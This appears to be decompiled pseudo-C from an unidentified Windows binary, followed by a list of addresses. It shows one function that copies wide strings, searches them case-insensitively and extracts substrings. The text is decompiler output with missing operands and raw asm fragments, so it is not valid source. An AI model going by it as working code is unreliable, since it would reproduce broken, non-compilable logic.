					_v64 = _t551;
					if((_a8 & 0x0000ffff) != 0) {
						__eflags = _t551;
						if(_t551 == 0) {
							_t459 = 0x40;
							_t581 = 0;
							L23:
							_t24 = _t581 + 2; // -2147483652
							_t493 = _t24;
							__eflags = _t493 - 0x40;
							_t494 =  <=  ? 0x40 : _t493;
							__eflags = _t459 - _t494;
							if(_t459 < _t494) {
								_t312 = (_t494 >> 5 >> 0x1a) + _t494 >> 6;
								_t495 = _t494 & 0x8000003f;
								__eflags = _t495;
								if(_t495 < 0) {
									_t495 = (_t495 - 0x00000001 | 0xffffffc0) + 1;
									__eflags = _t495;
								}
								__eflags = _t495;
								_t313 = _t312 + (0 | _t495 > 0x00000000);
								 *_t614 = _t313 << 6;
								_push(_t313 << 7);
								_t552 = E00411030();
								_t614 =  &(_t614[1]);
								_t498 = _v64;
								__eflags = _t498;
								if(_t498 == 0) {
									__eflags = 0;
									 *_t552 = 0;
									goto L35;
								} else {
									__eflags = _t552;
									if(_t552 == 0) {
										L33:
										_push(2);
										_push(_t498);
										E004110B0();
										_t614 =  &(_t614[2]);
										L35:
										_v60 =  *_t614;
										_v64 = _t552;
										L36:
										__eflags = 0;
										 *((short*)(_t552 + _t581 * 2)) = _a8 & 0x0000ffff;
										_t319 =  &_v64;
										 *((short*)( *_t319 + 2 + _t581 * 2)) = 0;
										L37:
										_t582 =  *_t319;
										if(_t582 == 0) {
											L39:
											_t500 = _a4;
											_push(0x80);
											 *_t500 = 0;
											 *((intOrPtr*)(_t500 + 4)) = 0;
											_t406 = E00411030();
											_t614 =  &(_t614[1]);
											_t323 =  *_a4;
											if(_t323 == 0) {
												 *_t406 = 0;
												L60:
												_t325 = _a4;
												 *_t325 = _t406;
												_t325[1] = 0x40;
												L61:
												_push(2);
												_push(_v64);
												E004110B0();
												_v64 = 0;
												_v60 = 0;
												return _a4;
											}
											if(_t406 == 0) {
												L45:
												_push(2);
												_push(_t323);
												E004110B0();
												_t614 =  &(_t614[2]);
												goto L60;
											}
											_t501 =  *_t323 & 0x0000ffff;
											 *_t406 = _t501;
											if(_t501 == 0) {
												goto L45;
											}
											_t502 = 0;
											while(1) {
												_t502 = _t502 + 1;
												_t463 =  *(_t323 + _t502 * 4 - 2) & 0x0000ffff;
												 *(_t406 + _t502 * 4 - 2) = _t463;
												if(_t463 == 0) {
													goto L45;
												}
												_t464 =  *(_t323 + _t502 * 4) & 0x0000ffff;
												 *(_t406 + _t502 * 4) = _t464;
												if(_t464 != 0) {
													continue;
												}
												goto L45;
											}
											goto L45;
										}
										_t330 =  *_t582 & 0x0000ffff;
										if(_t330 != 0) {
											_t554 =  *_t405;
											__eflags = _t554;
											if(_t554 == 0) {
												L52:
												_t503 = _a4;
												_push(0x80);
												 *_t503 = 0;
												 *((intOrPtr*)(_t503 + 4)) = 0;
												_t406 = E00411030();
												_t614 =  &(_t614[1]);
												_t334 =  *_a4;
												__eflags = _t334;
												if(_t334 == 0) {
													__eflags = 0;
													 *_t406 = 0;
													goto L60;
												}
												__eflags = _t406;
												if(_t406 == 0) {
													L58:
													_push(2);
													_push(_t334);
													E004110B0();
													_t614 =  &(_t614[2]);
													goto L60;
												}
												_t504 =  *_t334 & 0x0000ffff;
												 *_t406 = _t504;
												__eflags = _t504;
												if(_t504 == 0) {
													goto L58;
												}
												_t505 = 0;
												__eflags = 0;
												while(1) {
													_t505 = _t505 + 1;
													_t465 =  *(_t334 + _t505 * 4 - 2) & 0x0000ffff;
													 *(_t406 + _t505 * 4 - 2) = _t465;
													__eflags = _t465;
													if(_t465 == 0) {
														goto L58;
													}
													_t466 =  *(_t334 + _t505 * 4) & 0x0000ffff;
													 *(_t406 + _t505 * 4) = _t466;
													__eflags = _t466;
													if(_t466 != 0) {
														continue;
													}
													goto L58;
												}
												goto L58;
											}
											__eflags =  *_t554 & 0x0000ffff;
											if(( *_t554 & 0x0000ffff) == 0) {
												goto L52;
											}
											_v24 = _t582;
											__eflags = _t330 - 0x41 - 0x19;
											_t337 =  <=  ? _t330 + 0x20 : _t330;
											_t508 = 0;
											__eflags = 0;
											_t338 = ( <=  ? _t330 + 0x20 : _t330) & 0x0000ffff;
											_v44 = _t338;
											while(1) {
												_t584 =  *(_t554 + _t508 * 2) & 0x0000ffff;
												_t67 = _t584 - 0x41; // 0x7fffffbe
												__eflags = _t67 - 0x19;
												_t68 = _t584 + 0x20; // 0x8000001f
												_t585 =  <=  ? _t68 :  *(_t554 + _t508 * 2) & 0x0000ffff;
												__eflags = ( <=  ? _t68 :  *(_t554 + _t508 * 2) & 0x0000ffff) - _t338;
												if(( <=  ? _t68 :  *(_t554 + _t508 * 2) & 0x0000ffff) == _t338) {
													break;
												}
												_t508 = _t508 + 1;
												__eflags =  *(_t554 + _t508 * 2) & 0x0000ffff;
												if(( *(_t554 + _t508 * 2) & 0x0000ffff) != 0) {
													continue;
												}
												goto L52;
											}
											_t586 = _v24;
											_t469 = _t554 + _t508 * 2;
											__eflags = _t469;
											if(_t469 == 0) {
												goto L52;
											}
											_t510 = _t586 & 0x0000000f;
											asm("pxor xmm0, xmm0");
											_t340 = _t510 & 0x00000001;
											_t412 =  ~_t510 + 0x10 >> 1;
											_v52 = _t412;
											_v36 = _t554;
											_v24 = _t586;
											_t555 = _t412;
											while(1) {
												L68:
												_t587 = _t510;
												__eflags = _t510;
												if(_t510 == 0) {
													goto L74;
												}
												_t421 = 0;
												__eflags = _t340;
												if(_t340 != 0) {
													L78:
													_v28 = _t340;
													_t603 = _v24;
													while(1) {
														__eflags =  *(_t603 + _t421 * 2) & 0x0000ffff;
														if(( *(_t603 + _t421 * 2) & 0x0000ffff) == 0) {
															break;
														}
														_t421 = _t421 + 1;
														__eflags = _t421 - 0x7fffffff;
														if(_t421 < 0x7fffffff) {
															continue;
														}
														_v24 = _t603;
														_t341 = _v28;
														L82:
														_t421 = 0x7fffffff;
														L83:
														 *_t614 = _t421;
														_t588 = 0;
														__eflags = 0;
														_v32 = _t510;
														_v28 = _t341;
														while(1) {
															_t422 =  *(_t469 + _t588 * 2) & 0x0000ffff;
															_t124 = _t422 - 0x61; // 0x7fffff9e
															_t559 =  *(_v24 + _t588 * 2) & 0x0000ffff;
															__eflags = _t124 - 0x19;
															_t127 = _t422 - 0x20; // 0x7fffffdf
															_t423 =  <=  ? _t127 :  *(_t469 + _t588 * 2) & 0x0000ffff;
															_t343 = ( <=  ? _t127 :  *(_t469 + _t588 * 2) & 0x0000ffff) & 0x0000ffff;
															__eflags = _t559 - 0x61 - 0x19;
															_t560 =  <=  ? _t559 - 0x20 : _t559;
															__eflags = _t343 - ( <=  ? _t559 - 0x20 : _t559);
															if(__eflags < 0 || __eflags > 0) {
																break;
															}
															__eflags = _t343;
															if(_t343 == 0) {
																L88:
																_t510 = _v32;
																_t341 = _v28;
																_t563 = _v36;
																_t591 = _v24;
																L89:
																__eflags = _t469;
																if(_t469 == 0) {
																	goto L52;
																}
																_v28 = _t341;
																_v36 = _t563;
																_v24 = _t591;
																_t592 = 0;
																__eflags = 0;
																while(1) {
																	L91:
																	_t564 = _t469;
																	_t349 = _t469 + 2;
																	__eflags = _t349;
																	if(_t349 == 0) {
																		break;
																	}
																	__eflags =  *(_t469 + 2) & 0x0000ffff;
																	if(( *(_t469 + 2) & 0x0000ffff) == 0) {
																		break;
																	}
																	 *_t614 = _t564;
																	_t443 = _t592;
																	_v32 = _t510;
																	while(1) {
																		_t443 = _t443 + 1;
																		_t596 = _t469 + _t443 * 2;
																		_t537 =  *_t596 & 0x0000ffff;
																		__eflags = ( *(_t349 + _t443 * 2 - 2) & 0x0000ffff) + 0xffffffbf - 0x19;
																		_v48 = _t596;
																		_t538 =  <=  ? _t537 + 0x20 : _t537;
																		__eflags = ( <=  ? _t537 + 0x20 : _t537) - _v44;
																		if(( <=  ? _t537 + 0x20 : _t537) == _v44) {
																			break;
																		}
																		__eflags =  *(_t349 + _t443 * 2) & 0x0000ffff;
																		if(( *(_t349 + _t443 * 2) & 0x0000ffff) != 0) {
																			continue;
																		}
																		L96:
																		_t510 = _v32;
																		_t350 = _v28;
																		_t565 = _v36;
																		_t593 = _v24;
																		L97:
																		__eflags = _t510;
																		if(_t510 == 0) {
																			L102:
																			_t476 =  ~( ~_t510 + 0x00000007 & 0x00000007) + 0x7fffffff;
																			__eflags = _t476;
																			while(1) {
																				asm("movdqu xmm1, [esi+edx*2]");
																				asm("pcmpeqw xmm1, xmm0");
																				asm("pmovmskb eax, xmm1");
																				__eflags = _t350;
																				if(_t350 != 0) {
																					break;
																				}
																				_t510 = _t510 + 8;
																				__eflags = _t510 - _t476;
																				if(_t510 < _t476) {
																					continue;
																				}
																				__eflags = _t476 - 0x7fffffff;
																				if(_t476 >= 0x7fffffff) {
																					L108:
																					_t476 = 0x7fffffff;
																					L109:
																					_t352 = _t565 & 0x0000000f;
																					__eflags = _t352;
																					if(_t352 == 0) {
																						L114:
																						_t432 =  ~( ~_t352 + 0x00000007 & 0x00000007) + 0x7fffffff;
																						__eflags = _t432;
																						while(1) {
																							asm("movdqu xmm1, [edi+eax*2]");
																							asm("pcmpeqw xmm1, xmm0");
																							asm("pmovmskb edx, xmm1");
																							__eflags = _t510;
																							if(_t510 != 0) {
																								break;
																							}
																							_t352 = _t352 + 8;
																							__eflags = _t352 - _t432;
																							if(_t352 < _t432) {
																								continue;
																							}
																							__eflags = _t432 - 0x7fffffff;
																							if(_t432 >= 0x7fffffff) {
																								L120:
																								_t432 = 0x7fffffff;
																								L121:
																								_t594 = _a4;
																								_t518 =  *_t614 - _t565 + _t476 * 2 >> 1;
																								__eflags = _t518;
																								 *_t594 = 0;
																								_t519 =  <=  ? 0 : _t518;
																								__eflags = _t432 - _t519;
																								 *((intOrPtr*)(_t594 + 4)) = 0;
																								_t520 =  <  ? _t432 : _t519;
																								_t434 = _t432 - _t520;
																								_t566 = _t565 + _t520 * 2;
																								__eflags = _t566;
																								if(_t566 == 0) {
																									L156:
																									_push(0x80);
																									_t406 = E00411030();
																									_t614 =  &(_t614[1]);
																									_t357 =  *_a4;
																									__eflags = _t357;
																									if(_t357 == 0) {
																										 *_t406 = 0;
																										goto L60;
																									}
																									__eflags = _t406;
																									if(_t406 == 0) {
																										L162:
																										_push(2);
																										_push(_t357);
																										E004110B0();
																										_t614 =  &(_t614[2]);
																										goto L60;
																									}
																									_t521 =  *_t357 & 0x0000ffff;
																									 *_t406 = _t521;
																									__eflags = _t521;
																									if(_t521 == 0) {
																										goto L162;
																									}
																									_t522 = 0;
																									__eflags = 0;
																									while(1) {
																										_t522 = _t522 + 1;
																										_t479 =  *(_t357 + _t522 * 4 - 2) & 0x0000ffff;
																										 *(_t406 + _t522 * 4 - 2) = _t479;
																										__eflags = _t479;
																										if(_t479 == 0) {
																											goto L162;
																										}
																										_t480 =  *(_t357 + _t522 * 4) & 0x0000ffff;
																										 *(_t406 + _t522 * 4) = _t480;
																										__eflags = _t480;
																										if(_t480 != 0) {
																											continue;
																										}
																										goto L162;
																									}
																									goto L162;
																								}
																								_t360 =  *_t566 & 0x0000ffff;
																								__eflags = _t360;
																								if(_t360 == 0) {
																									goto L156;
																								}
																								__eflags = _t434;
																								if(_t434 != 0) {
																									L136:
																									_t176 = _t434 + 1; // 0x80000000
																									_t523 = _t176;
																									__eflags = _t523 - 0x40;
																									_t524 =  <=  ? 0x40 : _t523;
																									__eflags = _t524;
																									if(_t524 > 0) {
																										_t366 = (_t524 >> 5 >> 0x1a) + _t524 >> 6;
																										_t525 = _t524 & 0x8000003f;
																										__eflags = _t525;
																										if(_t525 < 0) {
																											_t525 = (_t525 - 0x00000001 | 0xffffffc0) + 1;
																											__eflags = _t525;
																										}
																										__eflags = _t525;
																										_t367 = _t366 + (0 | _t525 > 0x00000000);
																										 *_t614 = _t367 << 6;
																										_push(_t367 << 7);
																										_t595 = E00411030();
																										_t614 =  &(_t614[1]);
																										_t528 =  *_a4;
																										__eflags = _t528;
																										if(_t528 == 0) {
																											__eflags = 0;
																											 *_t595 = 0;
																											goto L148;
																										} else {
																											__eflags = _t595;
																											if(_t595 == 0) {
																												L146:
																												_push(2);
																												_push(_t528);
																												E004110B0();
																												_t614 =  &(_t614[2]);
																												L148:
																												_t529 = _a4;
																												_t529[1] =  *_t614;
																												 *_t529 = _t595;
																												L149:
																												__eflags = _t595;
																												if(_t595 == 0) {
																													goto L61;
																												}
																												_t373 = 0;
																												while(1) {
																													_t530 =  *_t566 & 0x0000ffff;
																													_t373 = _t373 + 1;
																													 *_t595 = _t530;
																													__eflags = _t434;
																													if(_t434 == 0) {
																														goto L154;
																													}
																													__eflags = _t373 - _t434;
																													if(_t373 == _t434) {
																														 *(_t595 + 2) = 0;
																														goto L61;
																													}
																													L154:
																													__eflags = _t530;
																													if(_t530 == 0) {
																														goto L61;
																													}
																													_t595 = _t595 + 2;
																													_t566 = _t566 + 2;
																													__eflags = _t566;
																												}
																											}
																											_t376 =  *_t528 & 0x0000ffff;
																											 *_t595 = _t376;
																											__eflags = _t376;
																											if(_t376 == 0) {
																												goto L146;
																											}
																											_t377 = 0;
																											__eflags = 0;
																											while(1) {
																												_t377 = _t377 + 1;
																												_t483 =  *(_t528 + _t377 * 4 - 2) & 0x0000ffff;
																												 *(_t595 + _t377 * 4 - 2) = _t483;
																												__eflags = _t483;
																												if(_t483 == 0) {
																													goto L146;
																												}
																												_t484 =  *(_t528 + _t377 * 4) & 0x0000ffff;
																												 *(_t595 + _t377 * 4) = _t484;
																												__eflags = _t484;
																												if(_t484 != 0) {
																													continue;
																												}
																												goto L146;
																											}
																											goto L146;
																										}
																									}
																									_t595 = 0;
																									goto L149;
																								}
																								_t534 = _t566 & 0x0000000f;
																								__eflags = _t534;
																								if(_t534 == 0) {
																									L129:
																									_t434 =  ~( ~_t534 + 0x00000007 & 0x00000007) + 0x7fffffff;
																									__eflags = _t434;
																									while(1) {
																										asm("movdqu xmm1, [edi+edx*2]");
																										asm("pcmpeqw xmm1, xmm0");
																										asm("pmovmskb eax, xmm1");
																										__eflags = _t360;
																										if(_t360 != 0) {
																											break;
																										}
																										_t534 = _t534 + 8;
																										__eflags = _t534 - _t434;
																										if(_t534 < _t434) {
																											continue;
																										}
																										__eflags = _t434 - 0x7fffffff;
																										if(_t434 >= 0x7fffffff) {
																											L135:
																											_t434 = 0x7fffffff;
																											goto L136;
																										} else {
																											goto L133;
																										}
																										while(1) {
																											L133:
																											__eflags =  *(_t566 + _t434 * 2) & 0x0000ffff;
																											if(( *(_t566 + _t434 * 2) & 0x0000ffff) == 0) {
																												goto L136;
																											}
																											_t434 = _t434 + 1;
																											__eflags = _t434 - 0x7fffffff;
																											if(_t434 < 0x7fffffff) {
																												continue;
																											}
																											goto L135;
																										}
																										goto L136;
																									}
																									asm("bsf ebx, eax");
																									_t434 = (_t434 >> 1) + _t534;
																									goto L136;
																								}
																								_t434 = 0;
																								__eflags = _t534 & 0x00000001;
																								if((_t534 & 0x00000001) != 0) {
																									goto L133;
																								}
																								_t534 =  ~_t534 + 0x10 >> 1;
																								__eflags = _t534;
																								while(1) {
																									_t360 =  *(_t566 + _t434 * 2) & 0x0000ffff;
																									__eflags = _t360;
																									if(_t360 == 0) {
																										goto L136;
																									}
																									_t434 = _t434 + 1;
																									__eflags = _t434 - _t534;
																									if(_t434 < _t534) {
																										continue;
																									}
																									goto L129;
																								}
																								goto L136;
																							} else {
																								goto L118;
																							}
																							while(1) {
																								L118:
																								__eflags =  *(_t565 + _t432 * 2) & 0x0000ffff;
																								if(( *(_t565 + _t432 * 2) & 0x0000ffff) == 0) {
																									goto L121;
																								}
																								_t432 = _t432 + 1;
																								__eflags = _t432 - 0x7fffffff;
																								if(_t432 < 0x7fffffff) {
																									continue;
																								}
																								goto L120;
																							}
																							goto L121;
																						}
																						asm("bsf ebx, edx");
																						_t432 = (_t432 >> 1) + _t352;
																						goto L121;
																					}
																					_t432 = 0;
																					__eflags = _t352 & 0x00000001;
																					if((_t352 & 0x00000001) != 0) {
																						goto L118;
																					}
																					_t352 =  ~_t352 + 0x10 >> 1;
																					__eflags = _t352;
																					while(1) {
																						_t510 =  *(_t565 + _t432 * 2) & 0x0000ffff;
																						__eflags = _t510;
																						if(_t510 == 0) {
																							goto L121;
																						}
																						_t432 = _t432 + 1;
																						__eflags = _t432 - _t352;
																						if(_t432 < _t352) {
																							continue;
																						}
																						goto L114;
																					}
																					goto L121;
																				} else {
																					goto L106;
																				}
																				while(1) {
																					L106:
																					__eflags =  *(_t593 + _t476 * 2) & 0x0000ffff;
																					if(( *(_t593 + _t476 * 2) & 0x0000ffff) == 0) {
																						goto L109;
																					}
																					_t476 = _t476 + 1;
																					__eflags = _t476 - 0x7fffffff;
																					if(_t476 < 0x7fffffff) {
																						continue;
																					}
																					goto L108;
																				}
																				goto L109;
																			}
																			asm("bsf ecx, eax");
																			_t476 = (_t476 >> 1) + _t510;
																			goto L109;
																		}
																		_t476 = 0;
																		__eflags = _t350;
																		if(_t350 != 0) {
																			goto L106;
																		}
																		_t510 = _v52;
																		_t441 = _t510;
																		while(1) {
																			_t350 =  *(_t593 + _t476 * 2) & 0x0000ffff;
																			__eflags = _t350;
																			if(_t350 == 0) {
																				goto L109;
																			}
																			_t476 = _t476 + 1;
																			__eflags = _t476 - _t441;
																			if(_t476 < _t441) {
																				continue;
																			}
																			goto L102;
																		}
																		goto L109;
																	}
																	_t485 = _v48;
																	_t510 = _v32;
																	_t570 = _v52;
																	_t383 = _v28;
																	while(1) {
																		_t598 = _t510;
																		__eflags = _t510;
																		if(_t510 == 0) {
																			goto L180;
																		}
																		L175:
																		_t452 = 0;
																		__eflags = _t383;
																		if(_t383 != 0) {
																			L184:
																			_v28 = _t383;
																			_t602 = _v24;
																			while(1) {
																				__eflags =  *(_t602 + _t452 * 2) & 0x0000ffff;
																				if(( *(_t602 + _t452 * 2) & 0x0000ffff) == 0) {
																					break;
																				}
																				_t452 = _t452 + 1;
																				__eflags = _t452 - 0x7fffffff;
																				if(_t452 < 0x7fffffff) {
																					continue;
																				}
																				_v24 = _t602;
																				_t384 = _v28;
																				L188:
																				_t452 = 0x7fffffff;
																				L189:
																				_v56 = _t452;
																				_t599 = 0;
																				__eflags = 0;
																				_v32 = _t510;
																				_v28 = _t384;
																				while(1) {
																					_t453 =  *(_t485 + _t599 * 2) & 0x0000ffff;
																					_t241 = _t453 - 0x61; // 0x7fffff9e
																					_t574 =  *(_v24 + _t599 * 2) & 0x0000ffff;
																					__eflags = _t241 - 0x19;
																					_t244 = _t453 - 0x20; // 0x7fffffdf
																					_t454 =  <=  ? _t244 :  *(_t485 + _t599 * 2) & 0x0000ffff;
																					_t386 = ( <=  ? _t244 :  *(_t485 + _t599 * 2) & 0x0000ffff) & 0x0000ffff;
																					__eflags = _t574 - 0x61 - 0x19;
																					_t575 =  <=  ? _t574 - 0x20 : _t574;
																					__eflags = _t386 - ( <=  ? _t574 - 0x20 : _t574);
																					if(__eflags < 0 || __eflags > 0) {
																						break;
																					}
																					__eflags = _t386;
																					if(_t386 == 0) {
																						L194:
																						_t564 =  *_t614;
																						_t592 = _t599 ^ _t599;
																						__eflags = _t592;
																						_t510 = _v32;
																						L195:
																						__eflags = _t485;
																						if(_t485 != 0) {
																							goto L91;
																						}
																						goto L196;
																					}
																					_t599 = _t599 + 1;
																					__eflags = _t599 - _v56;
																					if(_t599 < _v56) {
																						continue;
																					}
																					goto L194;
																				}
																				_t510 = _v32;
																				_t350 = _v28;
																				_t601 = _t485 + 2;
																				__eflags = _t601;
																				if(_t601 == 0) {
																					L207:
																					_t565 = _v36;
																					_t593 = _v24;
																					goto L97;
																				}
																				__eflags =  *(_t485 + 2) & 0x0000ffff;
																				if(( *(_t485 + 2) & 0x0000ffff) == 0) {
																					goto L207;
																				}
																				_v40 = _t485;
																				_t457 = 0;
																				__eflags = 0;
																				_v32 = _t510;
																				_v28 = _t350;
																				while(1) {
																					_t457 = _t457 + 1;
																					_t485 = _v40 + _t457 * 2;
																					_t387 =  *_t485 & 0x0000ffff;
																					__eflags = ( *(_t601 + _t457 * 2 - 2) & 0x0000ffff) + 0xffffffbf - 0x19;
																					_t388 =  <=  ? _t387 + 0x20 : _t387;
																					__eflags = ( <=  ? _t387 + 0x20 : _t387) - _v44;
																					if(( <=  ? _t387 + 0x20 : _t387) == _v44) {
																						break;
																					}
																					__eflags =  *(_t601 + _t457 * 2) & 0x0000ffff;
																					if(( *(_t601 + _t457 * 2) & 0x0000ffff) != 0) {
																						continue;
																					}
																					goto L96;
																				}
																				_t510 = _v32;
																				_t570 = _v52;
																				_t383 = _v28;
																				_t598 = _t510;
																				__eflags = _t510;
																				if(_t510 == 0) {
																					goto L180;
																				}
																				goto L175;
																			}
																			_v24 = _t602;
																			_t384 = _v28;
																			L198:
																			__eflags = _t452;
																			if(__eflags == 0) {
																				goto L188;
																			}
																			if(__eflags > 0) {
																				goto L189;
																			}
																			_v28 = _t384;
																			_t592 = 0;
																			_t564 =  *_t614;
																			goto L195;
																		}
																		_v32 = _t510;
																		_t598 = _t570;
																		_v28 = _t383;
																		_t544 = _v24;
																		while(1) {
																			__eflags =  *(_t544 + _t452 * 2) & 0x0000ffff;
																			if(( *(_t544 + _t452 * 2) & 0x0000ffff) == 0) {
																				break;
																			}
																			_t452 = _t452 + 1;
																			__eflags = _t452 - _t570;
																			if(_t452 < _t570) {
																				continue;
																			}
																			_v24 = _t544;
																			_t510 = _v32;
																			_t383 = _v28;
																			goto L180;
																		}
																		_v24 = _t544;
																		_t510 = _v32;
																		_t384 = _v28;
																		goto L198;
																		L180:
																		_v28 = _t383;
																		_t449 =  ~( ~_t598 + 0x00000007 & 0x00000007) + 0x7fffffff;
																		__eflags = _t449;
																		_t571 = _v24;
																		while(1) {
																			asm("movdqu xmm1, [edi+esi*2]");
																			asm("pcmpeqw xmm1, xmm0");
																			asm("pmovmskb eax, xmm1");
																			__eflags = _t383;
																			if(_t383 != 0) {
																				break;
																			}
																			_t598 = _t598 + 8;
																			__eflags = _t598 - _t449;
																			if(_t598 < _t449) {
																				continue;
																			}
																			_v24 = _t571;
																			_t384 = _v28;
																			__eflags = _t449 - 0x7fffffff;
																			if(_t449 >= 0x7fffffff) {
																				goto L188;
																			}
																			goto L184;
																		}
																		asm("bsf ebx, ebx");
																		_v24 = _t571;
																		_t452 = (_t383 >> 1) + _t598;
																		_t384 = _v28;
																		goto L198;
																	}
																}
																L196:
																 *_t614 = _t564;
																_t350 = _v28;
																_t565 = _v36;
																_t593 = _v24;
																goto L97;
															}
															_t588 = _t588 + 1;
															__eflags = _t588 -  *_t614;
															if(_t588 <  *_t614) {
																continue;
															}
															goto L88;
														}
														_t513 = _v32;
														_t344 = _v28;
														_t590 = _t469 + 2;
														__eflags = _t590;
														if(_t590 == 0) {
															goto L52;
														}
														__eflags =  *(_t469 + 2) & 0x0000ffff;
														if(( *(_t469 + 2) & 0x0000ffff) == 0) {
															goto L52;
														}
														_v40 = _t469;
														_t426 = 0;
														__eflags = 0;
														_v32 = _t513;
														_v28 = _t344;
														while(1) {
															_t426 = _t426 + 1;
															_t469 = _v40 + _t426 * 2;
															_t345 =  *_t469 & 0x0000ffff;
															__eflags = ( *(_t590 + _t426 * 2 - 2) & 0x0000ffff) + 0xffffffbf - 0x19;
															_t346 =  <=  ? _t345 + 0x20 : _t345;
															__eflags = ( <=  ? _t345 + 0x20 : _t345) - _v44;
															if(( <=  ? _t345 + 0x20 : _t345) == _v44) {
																break;
															}
															__eflags =  *(_t590 + _t426 * 2) & 0x0000ffff;
															if(( *(_t590 + _t426 * 2) & 0x0000ffff) != 0) {
																continue;
															}
															goto L52;
														}
														_t510 = _v32;
														_t555 = _v52;
														_t340 = _v28;
														goto L68;
													}
													_v24 = _t603;
													_t341 = _v28;
													L166:
													__eflags = _t421;
													if(__eflags == 0) {
														goto L82;
													}
													if(__eflags > 0) {
														goto L83;
													}
													_t563 = _v36;
													_t591 = _v24;
													goto L89;
												}
												_v32 = _t510;
												_t587 = _t555;
												_v28 = _t340;
												_t546 = _v24;
												while(1) {
													__eflags =  *(_t546 + _t421 * 2) & 0x0000ffff;
													if(( *(_t546 + _t421 * 2) & 0x0000ffff) == 0) {
														break;
													}
													_t421 = _t421 + 1;
													__eflags = _t421 - _t555;
													if(_t421 < _t555) {
														continue;
													}
													_v24 = _t546;
													_t510 = _v32;
													_t340 = _v28;
													goto L74;
												}
												_v24 = _t546;
												_t510 = _v32;
												_t341 = _v28;
												goto L166;
												L74:
												_v28 = _t340;
												_t418 =  ~( ~_t587 + 0x00000007 & 0x00000007) + 0x7fffffff;
												__eflags = _t418;
												_t556 = _v24;
												while(1) {
													asm("movdqu xmm1, [edi+esi*2]");
													asm("pcmpeqw xmm1, xmm0");
													asm("pmovmskb eax, xmm1");
													__eflags = _t340;
													if(_t340 != 0) {
														break;
													}
													_t587 = _t587 + 8;
													__eflags = _t587 - _t418;
													if(_t587 < _t418) {
														continue;
													}
													_v24 = _t556;
													_t341 = _v28;
													__eflags = _t418 - 0x7fffffff;
													if(_t418 >= 0x7fffffff) {
														goto L82;
													}
													goto L78;
												}
												asm("bsf ebx, ebx");
												_v24 = _t556;
												_t421 = (_t340 >> 1) + _t587;
												_t341 = _v28;
												goto L166;
											}
										}
										goto L39;
									}
									_t395 =  *_t498 & 0x0000ffff;
									 *_t552 = _t395;
									__eflags = _t395;
									if(_t395 == 0) {
										goto L33;
									}
									_t396 = 0;
									__eflags = 0;
									while(1) {
										_t396 = _t396 + 1;
										_t488 =  *(_t498 + _t396 * 4 - 2) & 0x0000ffff;
										 *(_t552 + _t396 * 4 - 2) = _t488;
										__eflags = _t488;
										if(_t488 == 0) {
											goto L33;
										}
										_t489 =  *(_t498 + _t396 * 4) & 0x0000ffff;
										 *(_t552 + _t396 * 4) = _t489;
										__eflags = _t489;
										if(_t489 != 0) {
											continue;
										}
										goto L33;
									}
									goto L33;
								}
							}
							_t552 = _v64;
							goto L36;
						}
						_t398 = _t551 & 0x0000000f;
						__eflags = _t398;
						if(_t398 == 0) {
							L16:
							asm("pxor xmm0, xmm0");
							_t609 =  ~( ~_t398 + 0x00000007 & 0x00000007) + 0x7fffffff;
							__eflags = _t609;
							while(1) {
								asm("movdqu xmm1, [edi+eax*2]");
								asm("pcmpeqw xmm1, xmm0");
								asm("pmovmskb edx, xmm1");
								__eflags = _t492;
								if(_t492 != 0) {
									break;
								}
								_t398 = _t398 + 8;
								__eflags = _t398 - _t609;
								if(_t398 < _t609) {
									continue;
								}
								__eflags = _t609 - 0x7fffffff;
								if(_t609 >= 0x7fffffff) {
									L22:
									_t459 = 0x40;
									_t581 = 0x7fffffff;
									goto L23;
								} else {
									goto L20;
								}
								while(1) {
									L20:
									__eflags =  *(_t551 + _t609 * 2) & 0x0000ffff;
									if(( *(_t551 + _t609 * 2) & 0x0000ffff) == 0) {
										break;
									}
									_t609 = _t609 + 1;
									__eflags = _t609 - 0x7fffffff;
									if(_t609 < 0x7fffffff) {
										continue;
									}
									goto L22;
								}
								L62:
								__eflags = _t581 - 0xfffffffe;
								if(_t581 != 0xfffffffe) {
									_t459 = 0x40;
								} else {
									 *_t551 = 0;
									_t459 = _v60;
								}
								goto L23;
							}
							asm("bsf esi, edx");
							_t581 = (_t609 >> 1) + _t398;
							goto L62;
						}
						_t609 = 0;
						__eflags = _t398 & 0x00000001;
						if((_t398 & 0x00000001) != 0) {
							goto L20;
						}
						_t398 =  ~_t398 + 0x10 >> 1;
						__eflags = _t398;
						while(1) {
							_t492 =  *(_t551 + _t609 * 2) & 0x0000ffff;
							__eflags = _t492;
							if(_t492 == 0) {
								goto L62;
							}
							_t609 = _t609 + 1;
							__eflags = _t609 - _t398;
							if(_t609 < _t398) {
								continue;
							}
							goto L16;
						}
						goto L62;
					}
					_t319 =  &_v64;
					goto L37;
				}
				if(_t551 == 0) {
					L6:
					_push(2);
					_push(_t304);
					E004110B0();
					_t614 =  &(_t614[2]);
					goto L8;
				}
				_t492 =  *_t304 & 0x0000ffff;
				 *_t551 = _t492;
				if(_t492 == 0) {
					goto L6;
				}
				while(1) {
					_t492 = 1;
					_t490 = _t304[1] & 0x0000ffff;
					 *(_t551 + 2) = _t490;
					if(_t490 == 0) {
						goto L6;
					}
					_t491 = _t304[2] & 0x0000ffff;
					 *(_t551 + 4) = _t491;
					if(_t491 != 0) {
						continue;
					}
					goto L6;
				}
				goto L6;
			}

0x0041c59e
0x0041c5a2
0x0041c5a4
0x0041c5a8
0x0041c5b2
0x0041c5b4
0x0041c5b7
0x0041c5bd
0x0041c5f7
0x0041c5f9
0x0041c5fc
0x0041c600
0x0041c608
0x0041c60e
0x0041c619
0x0041c61b
0x0041d019
0x0041d01e
0x0041c69f
0x0041c6a4
0x0041c6a4
0x0041c6a7
0x0041c6aa
0x0041c6ad
0x0041c6af
0x0041c6c4
0x0041c6c7
0x0041c6c7
0x0041c6cd
0x0041c6d5
0x0041c6d5
0x0041c6d5
0x0041c6d6
0x0041c6e0
0x0041c6ea
0x0041c6ed
0x0041c6f3
0x0041c6f5
0x0041c6f8
0x0041c6fc
0x0041c6fe
0x0041c738
0x0041c73a
0x00000000
0x0041c700
0x0041c700
0x0041c702
0x0041c72b
0x0041c72b
0x0041c72d
0x0041c72e
0x0041c733
0x0041c73d
0x0041c740
0x0041c744
0x0041c748
0x0041c74c
0x0041c74e
0x0041c752
0x0041c758
0x0041c75d
0x0041c75d
0x0041c761
0x0041c76a
0x0041c76a
0x0041c76f
0x0041c774
0x0041c776
0x0041c77e
0x0041c780
0x0041c786
0x0041c78a
0x0041c7c9
0x0041c878
0x0041c878
0x0041c87b
0x0041c87d
0x0041c884
0x0041c884
0x0041c886
0x0041c88a
0x0041c894
0x0041c898
0x0041c8a8
